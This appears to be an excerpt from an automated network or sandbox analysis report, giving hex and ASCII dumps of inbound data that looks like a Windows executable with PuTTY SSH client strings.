f0 4c 8d 4d e4 48 8d 45 38 48 89 45 f8 4c 8d 45 f0 8d 43 05 48 8d 55 e8 89 45 e4 48 8d 4d e0 89 45 e8 e8 02 02 00 00 40 84 f6 0f 84 49 ff ff ff 48 8b 45 Data Ascii: pIIHuHIH@ HA !Hu%HdH\$`H@_^]@uwwHE0HuHE0HHH;tHHE03HHE0uuHE0HELMHE8HELECHUEHME@IHE
2022-01-30 12:43:46 UTC	1439	IN	Data Raw: 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 40 48 8b 54 24 78 48 8b d9 48 8d 48 d8 4d 8b f1 41 8b f0 e8 10 cc fe ff 41 8b 4e 04 ff c9 80 7c 24 70 00 74 19 3b ce 75 15 33 c0 48 63 c9 41 83 3e 2d 0f 94 c0 48 03 c3 66 c7 04 01 30 00 41 83 3e 2d 75 06 c6 03 2d 48 ff c3 48 83 cf ff 41 83 7e 04 00 7f 24 4c 8b c7 49 ff c0 42 80 3c 03 00 75 f6 49 ff c0 48 8d 4b 01 48 8b d3 e8 bb bf fe ff c6 03 30 48 ff c3 eb 07 49 63 46 04 48 03 d8 85 f6 7e 78 48 8d 6b 01 4c 8b c7 49 ff c0 42 80 3c 03 00 75 f6 49 ff c0 48 8b d3 48 8b cd e8 89 bf fe ff 48 8b 44 24 28 48 8b 88 f8 00 00 00 48 8b 01 8a 08 88 0b 41 8b 46 04 85 c0 79 3e f7 d8 80 7c 24 70 00 75 04 3b c6 7d 02 8b f0 85 f6 74 1b 48 ff c7 80 3c 2f 00 75 f7 Data Ascii: A_A^A]A\_HHXHhHpHx AVH@HT$xHHHMAAN\|$pt;u3HcA>-Hf0A>-u-HHA~$LIB<uIHKH0HIcFH~xHkLIB<uIHHHD$(HHAFy>\|$pu;}tH</u
2022-01-30 12:43:46 UTC	1447	IN	Data Raw: ff 48 8b d8 48 85 c0 74 79 48 8b 07 48 85 c0 74 51 4c 8b f3 4c 2b f7 48 83 ce ff 48 ff c6 80 3c 30 00 75 f7 ba 01 00 00 00 48 8d 4e 01 e8 8b e6 ff ff 33 c9 49 89 04 3e e8 f4 c5 ff ff 49 8b 0c 3e 48 85 c9 74 58 4c 8b 07 48 8d 56 01 e8 db a0 ff ff 85 c0 75 32 48 83 c7 08 48 8b 07 48 85 c0 75 b5 33 c9 e8 c8 c5 ff ff 48 8b c3 48 8b 5c 24 40 48 8b 74 24 48 48 8b 7c 24 50 48 83 c4 30 41 5e c3 e8 16 59 ff ff cc 48 83 64 24 20 00 45 33 c9 45 33 c0 33 d2 33 c9 e8 b0 c6 ff ff cc e8 fa 58 ff ff cc cc 48 83 ec 28 85 c9 78 20 83 f9 02 7e 0d 83 f9 03 75 16 8b 05 34 21 04 00 eb 21 8b 05 2c 21 04 00 89 0d 26 21 04 00 eb 13 e8 db 41 ff ff c7 00 16 00 00 00 e8 50 c6 ff ff 83 c8 ff 48 83 c4 28 c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 41 8b f8 48 8b ea Data Ascii: HHtyHHtQLL+HH<0uHN3I>I>HtXLHVu2HHHu3HH\$@Ht$HH\|$PH0A^YHd$ E3E333XH(x ~u4!!,!&!APH(H\$Hl$Ht$WH AH
2022-01-30 12:43:46 UTC	1454	IN	Data Raw: 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 10 48 89 74 24 18 88 4c 24 08 57 48 83 ec 20 48 8b ca 48 8b da e8 4e c5 ff ff 8b 4b 14 4c 63 c8 f6 c1 c0 0f 84 8a 00 00 00 8b 3b 33 f6 48 8b 53 08 2b 7b 08 48 8d 42 01 48 89 03 8b 43 20 ff c8 89 43 10 85 ff 7e 1b 44 8b c7 41 8b c9 e8 96 ef ff ff 8b f0 48 8b 4b 08 3b f7 8a 44 24 30 88 01 eb 67 41 8d 41 02 83 f8 01 76 1e 49 8b c9 48 8d 15 57 fd 03 00 83 e1 3f 49 8b c1 48 c1 f8 06 48 c1 e1 06 48 03 0c c2 eb 07 48 8d 0d cc b0 03 00 f6 41 38 20 74 be 33 d2 41 8b c9 44 8d 42 02 e8 e4 5e 00 00 48 83 f8 ff 75 aa f0 83 4b 14 10 b0 01 eb 19 41 b8 01 00 00 00 48 8d 54 24 30 41 8b c9 e8 22 ef ff ff 83 f8 01 0f 94 c0 48 8b 5c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 89 5c 24 10 48 89 74 24 18 66 89 4c 24 Data Ascii: \$0Ht$8H _H\$Ht$L$WH HHNKLc;3HS+{HBHC C~DAHK;D$0gAAvIHW?IHHHHA8 t3ADB^HuKAHT$0A"H\$8Ht$@H _H\$Ht$fL$
2022-01-30 12:43:46 UTC	1462	IN	Data Raw: 20 48 8b 4d 20 4c 8b cf 4c 8b c6 e8 b9 fc ff ff 84 c0 0f 85 28 01 00 00 e9 7b fe ff ff 0f b6 55 50 4c 8b cf 48 89 44 24 28 4c 8b c6 48 8b 45 40 48 89 44 24 20 e8 23 0c 00 00 84 c0 0f 84 56 fe ff ff 48 8b 55 40 48 8d 0d 10 05 03 00 48 39 1a 74 1f 44 0f b7 01 66 45 85 c0 74 15 48 8b 07 48 83 c1 02 66 44 89 00 48 83 07 02 48 83 2a 01 75 e1 48 8b 45 48 48 8b 4d 20 48 89 44 24 28 48 89 54 24 20 ba 02 00 00 00 4c 8b cf 4c 8b c6 e8 ca 0b 00 00 e9 78 ff ff ff 83 7e 10 0b 77 46 48 63 4e 10 33 db 48 8b 45 48 48 8b 94 c8 d0 01 00 00 48 8b 4d 40 48 39 19 0f 84 83 00 00 00 44 0f b7 02 66 45 85 c0 74 79 48 8b 07 48 83 c2 02 66 44 89 00 48 83 07 02 48 83 29 01 75 e1 eb 62 83 7e 18 06 76 22 e8 44 03 ff ff c7 00 16 00 00 00 e8 b9 87 ff ff 32 c0 48 8b 9c 24 80 00 00 00 48 Data Ascii: HM LL({UPLHD$(LHE@HD$ #VHU@HH9tDfEtHHfDHH*uHEHHM HD$(HT$ LLx~wFHcN3HEHHHM@H9DfEtyHHfDHH)ub~v"D2H$H
2022-01-30 12:43:46 UTC	1470	IN	Data Raw: 00 00 48 89 4c 24 38 4d 8b f1 48 8d 4c 24 60 4c 89 4c 24 58 4d 8b f8 4c 89 44 24 78 8b fa e8 fa 4e 00 00 8b 44 24 60 45 33 ed 83 e0 1f 3c 1f 75 07 44 88 6c 24 68 eb 0f 48 8d 4c 24 60 e8 4b 4f 00 00 c6 44 24 68 01 48 8b 44 24 38 bb 20 00 00 00 48 85 c0 4d 89 77 08 8b cb 41 b9 ff 07 00 00 49 ba ff ff ff ff ff ff 0f 00 8d 53 0d 0f 48 ca 48 8b d0 48 c1 ea 34 41 89 0f 49 23 d1 75 2c 49 85 c2 75 27 48 8b 95 40 07 00 00 4c 8d 05 6c 66 02 00 49 8b ce 45 89 6f 04 e8 cf 42 ff ff 85 c0 0f 85 9d 11 00 00 e9 64 11 00 00 be 02 00 00 00 49 3b d1 74 05 41 8b cd eb 40 48 8b c8 49 23 ca 75 07 b9 01 00 00 00 eb 29 48 85 c0 79 16 48 ba 00 00 00 00 00 00 08 00 48 3b ca 75 07 b9 04 00 00 00 eb 0e 48 8b c8 48 c1 e9 33 f7 d1 83 e1 01 0b ce 41 c7 47 04 01 00 00 00 83 e9 01 0f 84 Data Ascii: HL$8MHL$`LL$XMLD$xND$`E3<uDl$hHL$`KOD$hHD$8 HMwAISHHH4AI#u,Iu'H@LlfIEoBdI;tA@HI#u)HyHH;uHH3AG
2022-01-30 12:43:46 UTC	1478	IN	Data Raw: e9 00 00 00 00 48 89 5c 24 08 57 48 83 ec 40 48 8b da 48 8b f9 48 85 c9 75 14 e8 8e c5 fe ff c7 00 16 00 00 00 e8 03 4a ff ff 33 c0 eb 60 48 85 db 74 e7 48 3b fb 73 f2 49 8b d0 48 8d 4c 24 20 e8 c8 2f fe ff 48 8b 4c 24 30 48 8d 53 ff 83 79 08 00 74 24 48 ff ca 48 3b fa 77 0a 0f b6 02 f6 44 08 19 04 75 ee 48 8b cb 48 2b ca 48 8b d3 83 e1 01 48 2b d1 48 ff ca 80 7c 24 38 00 74 0c 48 8b 4c 24 20 83 a1 a8 03 00 00 fd 48 8b c2 48 8b 5c 24 50 48 83 c4 40 5f c3 48 83 ec 28 48 85 c9 75 19 e8 06 c5 fe ff c7 00 16 00 00 00 e8 7b 49 ff ff 48 83 c8 ff 48 83 c4 28 c3 4c 8b c1 33 d2 48 8b 0d 52 9f 03 00 48 83 c4 28 48 ff 25 cf 07 03 00 cc cc cc e9 bf ff ff ff cc cc cc 48 8b c4 48 89 58 08 48 89 70 10 48 89 78 18 4c 89 70 20 55 48 8d 68 a1 48 81 ec a0 00 00 00 48 8b f2 Data Ascii: H\$WH@HHHuJ3`HtH;sIHL$ /HL$0HSyt$HH;wDuHH+HH+H\|$8tHL$ HH\$PH@_H(Hu{IHH(L3HRH(H%HHXHpHxLp UHhHH
2022-01-30 12:43:46 UTC	1486	IN	Data Raw: fe ff ff eb 30 39 5f 18 74 0f e8 06 b9 ff ff 48 8b d8 48 63 47 18 48 03 d8 48 8d 57 08 49 8b 4e 28 e8 d3 1b 00 00 4c 8b c0 48 8b d3 48 8b ce e8 3d fe ff ff 90 48 8b 5c 24 30 48 8b 74 24 38 48 8b 7c 24 40 48 83 c4 20 41 5e c3 e8 35 fe fe ff 90 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 33 db 4d 8b f0 48 8b ea 48 8b f9 39 59 04 74 0f 48 63 71 04 e8 66 b8 ff ff 48 8d 0c 06 eb 05 48 8b cb 8b f3 48 85 c9 0f 84 db 00 00 00 85 f6 74 0f 48 63 77 04 e8 45 b8 ff ff 48 8d 0c 06 eb 05 48 8b cb 8b f3 38 59 10 0f 84 ba 00 00 00 f6 07 80 74 0a f6 45 00 10 0f 85 ab 00 00 00 85 f6 74 11 e8 19 b8 ff ff 48 8b f0 48 63 47 04 48 03 f0 eb 03 48 8b f3 e8 31 b8 ff ff 48 8b c8 48 63 45 04 48 03 c8 48 3b f1 74 4b 39 5f 04 74 11 e8 ec b7 ff ff 48 8b Data Ascii: 09_tHHcGHHWIN(LHH=H\$0Ht$8H\|$@H A^5HHXHhHpHx AVH 3MHH9YtHcqfHHHtHcwEHH8YtEtHHcGHH1HHcEHH;tK9_tH
2022-01-30 12:43:46 UTC	1493	IN	Data Raw: 00 00 e8 22 07 00 00 83 e3 fd 40 f6 c7 10 74 14 48 0f ba e6 0c 73 0d b9 20 00 00 00 e8 08 07 00 00 83 e3 ef 48 8b 74 24 38 33 c0 85 db 48 8b 5c 24 30 0f 94 c0 48 83 c4 20 5f c3 cc cc 48 b8 00 00 00 00 00 00 08 00 48 0b c8 48 89 4c 24 08 f2 0f 10 44 24 08 c3 cc cc cc 48 8b c4 55 53 56 57 41 56 48 8d 68 c9 48 81 ec f0 00 00 00 0f 29 70 c8 48 8b 05 69 14 03 00 48 33 c4 48 89 45 ef 8b f2 4c 8b f1 ba c0 ff 00 00 b9 80 1f 00 00 41 8b f9 49 8b d8 e8 00 06 00 00 8b 4d 5f 48 89 44 24 40 48 89 5c 24 50 f2 0f 10 44 24 50 48 8b 54 24 40 f2 0f 11 44 24 48 e8 c5 fe ff ff f2 0f 10 75 77 85 c0 75 40 83 7d 7f 02 75 11 8b 45 bf 83 e0 e3 f2 0f 11 75 af 83 c8 03 89 45 bf 44 8b 45 5f 48 8d 44 24 48 48 89 44 24 28 48 8d 54 24 40 48 8d 45 6f 44 8b ce 48 8d 4c 24 60 48 89 44 24 Data Ascii: "@tHs Ht$83H\$0H _HHHL$D$HUSVWAVHhH)pHiH3HELAIM_HD$@H\$PD$PHT$@D$Huwu@}uEuEDE_HD$HHD$(HT$@HEoDHL$`HD$
2022-01-30 12:43:46 UTC	1501	IN	Data Raw: 00 c4 05 00 00 c4 05 00 00 0d 00 00 00 d0 05 00 00 ea 05 00 00 03 00 00 00 f0 05 00 00 f4 05 00 00 03 00 00 00 00 06 00 00 03 06 00 00 04 00 00 00 0c 06 00 00 0c 06 00 00 0c 00 00 00 0d 06 00 00 0d 06 00 00 04 00 00 00 10 06 00 00 15 06 00 00 0d 00 00 00 1b 06 00 00 1b 06 00 00 04 00 00 00 1f 06 00 00 1f 06 00 00 04 00 00 00 21 06 00 00 3a 06 00 00 04 00 00 00 40 06 00 00 4a 06 00 00 04 00 00 00 4b 06 00 00 58 06 00 00 0d 00 00 00 60 06 00 00 69 06 00 00 0b 00 00 00 6a 06 00 00 6a 06 00 00 0a 00 00 00 6b 06 00 00 6c 06 00 00 0b 00 00 00 6d 06 00 00 6f 06 00 00 04 00 00 00 70 06 00 00 70 06 00 00 0d 00 00 00 71 06 00 00 d5 06 00 00 04 00 00 00 d6 06 00 00 dc 06 00 00 0d 00 00 00 dd 06 00 00 dd 06 00 00 04 00 00 00 de 06 00 00 e4 06 00 00 0d 00 00 00 e5 06 Data Ascii: !:@JKX`ijjklmoppq
2022-01-30 12:43:46 UTC	1509	IN	Data Raw: 00 7c 47 0c 40 01 00 00 00 70 47 0c 40 01 00 00 00 fb 4a 0c 40 01 00 00 00 3c 55 0c 40 01 00 00 00 de 48 0c 40 01 00 00 00 b0 40 0c 40 01 00 00 00 f6 4d 0c 40 01 00 00 00 b8 4b 0c 40 01 00 00 00 f7 64 0c 40 01 00 00 00 92 4d 0c 40 01 00 00 00 02 49 0c 40 01 00 00 00 5a 52 0c 40 01 00 00 00 63 48 0c 40 01 00 00 00 47 53 0c 40 01 00 00 00 31 4c 0c 40 01 00 00 00 01 4b 0c 40 01 00 00 00 e9 4c 0c 40 01 00 00 00 42 48 0c 40 01 00 00 00 eb 49 0c 40 01 00 00 00 d5 4a 0c 40 01 00 00 00 71 53 0c 40 01 00 00 00 e4 49 0c 40 01 00 00 00 9a 42 0c 40 01 00 00 00 1f 55 0c 40 01 00 00 00 76 47 0c 40 01 00 00 00 f5 4a 0c 40 01 00 00 00 6a 47 0c 40 01 00 00 00 21 44 0c 40 01 00 00 00 e6 65 0c 40 01 00 00 00 e9 64 0c 40 01 00 00 00 9b 57 0c 40 01 00 00 00 0b 55 0c 40 01 00 Data Ascii: \|G@pG@J@<U@H@@@M@K@d@M@I@ZR@cH@GS@1L@K@L@BH@I@J@qS@I@B@U@vG@J@jG@!D@e@d@W@U@
2022-01-30 12:43:46 UTC	1517	IN	Data Raw: 22 81 e5 e5 3a dc da c2 37 34 76 b5 c8 a7 dd f3 9a 46 61 44 a9 0e 03 d0 0f 3e c7 c8 ec 41 1e 75 a4 99 cd 38 e2 2f 0e ea 3b a1 bb 80 32 31 b3 3e 18 38 8b 54 4e 08 b9 6d 4f 03 0d 42 6f bf 04 0a f6 90 12 b8 2c 79 7c 97 24 72 b0 79 56 af 89 af bc 1f 77 9a de 10 08 93 d9 12 ae 8b b3 2e 3f cf dc 1f 72 12 55 24 71 6b 2e e6 dd 1a 50 87 cd 84 9f 18 47 58 7a 17 da 08 74 bc 9a 9f bc 8c 7d 4b e9 3a ec 7a ec fa 1d 85 db 66 43 09 63 d2 c3 64 c4 47 18 1c ef 08 d9 15 32 37 3b 43 dd 16 ba c2 24 43 4d a1 12 51 c4 65 2a 02 00 94 50 dd e4 3a 13 9e f8 df 71 55 4e 31 10 d6 77 ac 81 9b 19 11 5f f1 56 35 04 6b c7 a3 d7 3b 18 11 3c 09 a5 24 59 ed e6 8f f2 fa fb f1 97 2c bf ba 9e 6e 3c 15 1e 70 45 e3 86 b1 6f e9 ea 0a 5e 0e 86 b3 2a 3e 5a 1c e7 1f 77 fa 06 3d 4e b9 dc 65 29 0f 1d Data Ascii: ":74vFaD>Au8/;21>8TNmOBo,y\|$ryVw.?rU$qk.PGXzt}K:zfCcdG27;C$CMQeP:qUN1w_V5k;<$Y,n<pEo^>Zw=Ne)
2022-01-30 12:43:46 UTC	1525	IN	Data Raw: 00 55 44 04 40 01 00 00 00 96 44 04 40 01 00 00 00 da 44 04 40 01 00 00 00 4a 45 04 40 01 00 00 00 0e 3d 04 40 01 00 00 00 35 68 0c 40 01 00 00 00 35 68 0c 40 01 00 00 00 90 ee 0a 40 01 00 00 00 00 00 00 00 00 00 00 00 e1 52 04 40 01 00 00 00 58 02 0b 40 01 00 00 00 ec f2 0a 40 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3d 04 40 01 00 00 00 1e 3e 04 40 01 00 00 00 9d 3e 04 40 01 00 00 00 65 3f 04 40 01 00 00 00 ff f6 00 40 01 00 00 00 9a 3f 04 40 01 00 00 00 7b 41 04 40 01 00 00 00 0e 44 04 40 01 00 00 00 55 44 04 40 01 00 00 00 96 44 04 40 01 00 00 00 da 44 04 40 01 00 00 00 4a 45 04 40 01 00 00 00 0e 3d 04 40 01 00 00 00 c6 6a 0c 40 01 00 00 00 c6 6a 0c 40 01 00 00 00 48 ef 0a 40 01 00 00 00 00 00 00 00 00 00 Data Ascii: UD@D@D@JE@=@5h@5h@@R@X@@ =@>@>@e?@@?@{A@D@UD@D@D@JE@=@j@j@H@
2022-01-30 12:43:46 UTC	1533	IN	Data Raw: fc 02 82 42 c2 22 a2 62 e2 12 92 52 d2 32 b2 72 f2 0a 8a 4a ca 2a aa 6a ea 1a 9a 5a da 3a ba 7a fa 06 86 46 c6 26 a6 66 e6 16 96 56 d6 36 b6 76 f6 0e 8e 4e ce 2e ae 6e ee 1e 9e 5e de 3e be 7e fe 01 81 41 c1 21 a1 61 e1 11 91 51 d1 31 b1 71 f1 09 89 49 c9 29 a9 69 e9 19 99 59 d9 39 b9 79 f9 05 85 45 c5 25 a5 65 e5 15 95 55 d5 35 b5 75 f5 0d 8d 4d cd 2d ad 6d ed 1d 9d 5d dd 3d bd 7d fd 03 83 43 c3 23 a3 63 e3 13 93 53 d3 33 b3 73 f3 0b 8b 4b cb 2b ab 6b eb 1b 9b 5b db 3b bb 7b fb 07 87 47 c7 27 a7 67 e7 17 97 57 d7 37 b7 77 f7 0f 8f 4f cf 2f af 6f ef 1f 9f 5f df 3f bf 7f ff 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 a0 36 05 40 01 00 00 00 4a 3b 05 40 01 00 Data Ascii: B"bR2rJ*jZ:zF&fV6vN.n^>~A!aQ1qI)iY9yE%eU5uM-m]=}C#cS3sK+k[;{G'gW7wO/o_?6@J;@
2022-01-30 12:43:46 UTC	1540	IN	Data Raw: 00 8f f1 01 00 90 f1 01 00 9b f1 01 00 ac f1 01 00 00 01 0e 00 ef 01 0e 00 00 00 0f 00 fd ff 0f 00 00 00 10 00 fd ff 10 00 68 8f 0c 40 01 00 00 00 17 cf 0b 40 01 00 00 00 fd 98 0c 40 01 00 00 00 05 00 00 00 4b 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 08 00 00 00 29 b0 0b 40 01 00 00 00 33 b0 0b 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 25 73 20 53 65 63 75 72 69 74 79 20 41 6c 65 72 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 68 65 20 66 69 72 73 74 20 25 73 20 73 75 70 70 6f 72 74 65 64 20 62 79 20 74 68 65 20 73 65 72 76 65 72 0a 69 73 20 25 73 2c 20 77 68 69 63 68 20 69 73 20 62 65 6c 6f 77 20 74 68 65 20 63 6f 6e 66 69 67 75 72 65 64 0a 77 61 72 6e 69 6e 67 20 74 68 72 65 73 68 6f 6c 64 2e 0a 44 Data Ascii: h@@@K)@3@%s Security AlertThe first %s supported by the serveris %s, which is below the configuredwarning threshold.D
2022-01-30 12:43:46 UTC	1548	IN	Data Raw: 00 7e 01 b9 00 ba 00 bb 00 52 01 53 01 78 01 bf 00 c0 00 c1 00 c2 00 c3 00 c4 00 c5 00 c6 00 c7 00 c8 00 c9 00 ca 00 cb 00 cc 00 cd 00 ce 00 cf 00 d0 00 d1 00 d2 00 d3 00 d4 00 d5 00 d6 00 d7 00 d8 00 d9 00 da 00 db 00 dc 00 dd 00 de 00 df 00 e0 00 e1 00 e2 00 e3 00 e4 00 e5 00 e6 00 e7 00 e8 00 e9 00 ea 00 eb 00 ec 00 ed 00 ee 00 ef 00 f0 00 f1 00 f2 00 f3 00 f4 00 f5 00 f6 00 f7 00 f8 00 f9 00 fa 00 fb 00 fc 00 fd 00 fe 00 ff 00 a0 00 04 01 05 01 41 01 ac 20 1e 20 60 01 a7 00 61 01 a9 00 18 02 ab 00 79 01 ad 00 7a 01 7b 01 b0 00 b1 00 0c 01 42 01 7d 01 1d 20 b6 00 b7 00 7e 01 0d 01 19 02 bb 00 52 01 53 01 78 01 7c 01 c0 00 c1 00 c2 00 02 01 c4 00 06 01 c6 00 c7 00 c8 00 c9 00 ca 00 cb 00 cc 00 cd 00 ce 00 cf 00 10 01 43 01 d2 00 d3 00 d4 00 50 01 d6 00 Data Ascii: ~RSxA `ayz{B} ~RSx\|CP
2022-01-30 12:43:46 UTC	1556	IN	Data Raw: 00 40 04 0d 40 01 00 00 00 f0 10 0d 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@@
2022-01-30 12:43:46 UTC	1564	IN	Data Raw: 00 60 08 0d 40 01 00 00 00 74 00 00 00 00 00 00 00 00 f3 0c 40 01 00 00 00 18 00 00 00 00 00 00 00 c0 0e 0d 40 01 00 00 00 af 00 00 00 00 00 00 00 08 05 0d 40 01 00 00 00 5a 00 00 00 00 00 00 00 80 f2 0c 40 01 00 00 00 0d 00 00 00 00 00 00 00 70 03 0d 40 01 00 00 00 4f 00 00 00 00 00 00 00 58 f2 0c 40 01 00 00 00 28 00 00 00 00 00 00 00 18 09 0d 40 01 00 00 00 6a 00 00 00 00 00 00 00 f0 f3 0c 40 01 00 00 00 1f 00 00 00 00 00 00 00 58 0d 0d 40 01 00 00 00 61 00 00 00 00 00 00 00 c8 f2 0c 40 01 00 00 00 0e 00 00 00 00 00 00 00 58 04 0d 40 01 00 00 00 50 00 00 00 00 00 00 00 b0 f2 0c 40 01 00 00 00 0f 00 00 00 00 00 00 00 88 0b 0d 40 01 00 00 00 95 00 00 00 00 00 00 00 e0 03 0d 40 01 00 00 00 51 00 00 00 00 00 00 00 18 f4 0c 40 01 00 00 00 10 00 00 00 00 00 Data Ascii: `@t@@@Z@p@OX@(@j@X@a@X@P@@@Q@
2022-01-30 12:43:46 UTC	1572	IN	Data Raw: 3f 7b 14 ae 47 e1 7a f4 3f 66 60 59 34 ce 6d f4 3f 9a cf f5 c7 cb 60 f4 3f ca 76 c7 e2 d9 53 f4 3f fb d9 62 65 f8 46 f4 3f 4d ee ab 30 27 3a f4 3f 87 1f d5 25 66 2d f4 3f 51 59 5e 26 b5 20 f4 3f 14 14 14 14 14 14 f4 3f 66 65 0e d1 82 07 f4 3f fb 13 b0 3f 01 fb f3 3f 07 af a5 42 8f ee f3 3f 02 a9 e4 bc 2c e2 f3 3f c6 75 aa 91 d9 d5 f3 3f e7 ab 7b a4 95 c9 f3 3f 55 29 23 d9 60 bd f3 3f 14 3b b1 13 3b b1 f3 3f 22 c8 7a 38 24 a5 f3 3f 63 7f 18 2c 1c 99 f3 3f 8e 08 66 d3 22 8d f3 3f 14 38 81 13 38 81 f3 3f ee 45 c9 d1 5b 75 f3 3f 48 07 de f3 8d 69 f3 3f f8 2a 9f 5f ce 5d f3 3f c1 78 2b fb 1c 52 f3 3f 46 13 e0 ac 79 46 f3 3f b2 bc 57 5b e4 3a f3 3f fa 1d 6a ed 5c 2f f3 3f bf 10 2b 4a e3 23 f3 3f b6 eb e9 58 77 18 f3 3f 90 d1 30 01 19 0d f3 3f 60 02 c4 2a c8 01 Data Ascii: ?{Gz?f`Y4m?`?vS?beF?M0':?%f-?QY^& ??fe???B?,?u?{?U)#`?;;?"z8$?c,?f"?88?E[u?Hi?_]?x+R?FyF?W[:?j\/?+J#?Xw?0?`
2022-01-30 12:43:46 UTC	1579	IN	Data Raw: 65 64 20 70 75 62 6c 69 63 20 6b 65 79 73 00 4d 69 73 63 6f 6d 70 75 74 65 73 20 53 53 48 2d 32 20 48 4d 41 43 20 6b 65 79 73 00 50 61 67 65 61 6e 74 20 68 61 73 20 25 7a 75 20 53 53 48 2d 32 20 6b 65 79 73 00 50 61 67 65 61 6e 74 20 68 61 73 20 25 7a 75 20 53 53 48 2d 31 20 6b 65 79 73 00 50 72 65 66 65 72 4b 6e 6f 77 6e 48 6f 73 74 4b 65 79 73 00 53 53 48 4d 61 6e 75 61 6c 48 6f 73 74 4b 65 79 73 00 53 6f 66 74 77 61 72 65 5c 53 69 6d 6f 6e 54 61 74 68 61 6d 5c 50 75 54 54 59 5c 53 73 68 48 6f 73 74 4b 65 79 73 00 43 74 72 6c 41 6c 74 4b 65 79 73 00 41 70 70 6c 69 63 61 74 69 6f 6e 43 75 72 73 6f 72 4b 65 79 73 00 4c 69 6e 75 78 46 75 6e 63 74 69 6f 6e 4b 65 79 73 00 4e 6f 41 70 70 6c 69 63 61 74 69 6f 6e 4b 65 79 73 00 57 69 6e 4e 61 6d 65 41 6c 77 61 Data Ascii: ed public keysMiscomputes SSH-2 HMAC keysPageant has %zu SSH-2 keysPageant has %zu SSH-1 keysPreferKnownHostKeysSSHManualHostKeysSoftware\SimonTatham\PuTTY\SshHostKeysCtrlAltKeysApplicationCursorKeysLinuxFunctionKeysNoApplicationKeysWinNameAlwa
2022-01-30 12:43:46 UTC	1587	IN	Data Raw: 66 6f 72 6d 61 74 20 65 72 72 6f 72 00 67 65 74 68 6f 73 74 62 79 6e 61 6d 65 3a 20 75 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 00 63 6f 6d 70 72 65 73 73 69 6f 6e 20 65 72 72 6f 72 00 70 72 6f 74 6f 63 6f 6c 20 65 72 72 6f 72 00 49 6e 74 65 72 6e 61 6c 20 53 53 50 49 20 65 72 72 6f 72 00 4d 41 43 20 65 72 72 6f 72 00 57 53 41 47 65 74 4c 61 73 74 45 72 72 6f 72 00 25 73 20 45 72 72 6f 72 00 25 73 20 46 61 74 61 6c 20 45 72 72 6f 72 00 25 73 20 49 6e 74 65 72 6e 61 6c 20 45 72 72 6f 72 00 25 73 20 43 6f 6d 6d 61 6e 64 20 4c 69 6e 65 20 45 72 72 6f 72 00 25 73 20 53 6f 75 6e 64 20 45 72 72 6f 72 00 49 6e 73 74 61 6c 6c 44 69 72 00 45 6e 64 20 6f 66 20 6b 65 79 62 6f 61 72 64 2d 69 6e 74 65 72 61 63 74 69 76 65 20 70 72 6f 6d 70 74 73 20 66 72 6f 6d 20 73 65 72 Data Ascii: format errorgethostbyname: unknown errorcompression errorprotocol errorInternal SSPI errorMAC errorWSAGetLastError%s Error%s Fatal Error%s Internal Error%s Command Line Error%s Sound ErrorInstallDirEnd of keyboard-interactive prompts from ser
2022-01-30 12:43:46 UTC	1595	IN	Data Raw: 6e 66 69 67 2d 73 73 68 2d 61 75 74 68 2d 67 73 73 61 70 69 00 41 64 6a 75 73 74 57 69 6e 64 6f 77 52 65 63 74 45 78 46 6f 72 44 70 69 00 47 65 74 53 79 73 74 65 6d 4d 65 74 72 69 63 73 46 6f 72 44 70 69 00 63 6f 6e 66 69 67 2d 73 73 68 2d 6b 69 00 73 75 70 64 75 70 2d 61 73 63 69 69 00 63 6f 6e 66 69 67 2d 66 65 61 74 75 72 65 73 2d 62 69 64 69 00 44 69 73 61 62 6c 65 42 69 64 69 00 41 72 67 6f 6e 32 69 00 2d 69 00 73 73 68 2d 75 73 65 72 61 75 74 68 00 63 6f 6e 66 69 67 2d 73 73 68 2d 6e 6f 61 75 74 68 00 63 6f 6e 66 69 67 2d 73 73 68 2d 6e 6f 74 72 69 76 69 61 6c 61 75 74 68 00 63 6f 6e 66 69 67 2d 73 73 68 2d 78 31 31 61 75 74 68 00 63 6f 6e 66 69 67 2d 70 72 6f 78 79 2d 61 75 74 68 00 2d 6e 6f 2d 74 72 69 76 69 61 6c 2d 61 75 74 68 00 4d 69 73 75 73 Data Ascii: nfig-ssh-auth-gssapiAdjustWindowRectExForDpiGetSystemMetricsForDpiconfig-ssh-kisupdup-asciiconfig-features-bidiDisableBidiArgon2i-issh-userauthconfig-ssh-noauthconfig-ssh-notrivialauthconfig-ssh-x11authconfig-proxy-auth-no-trivial-authMisus
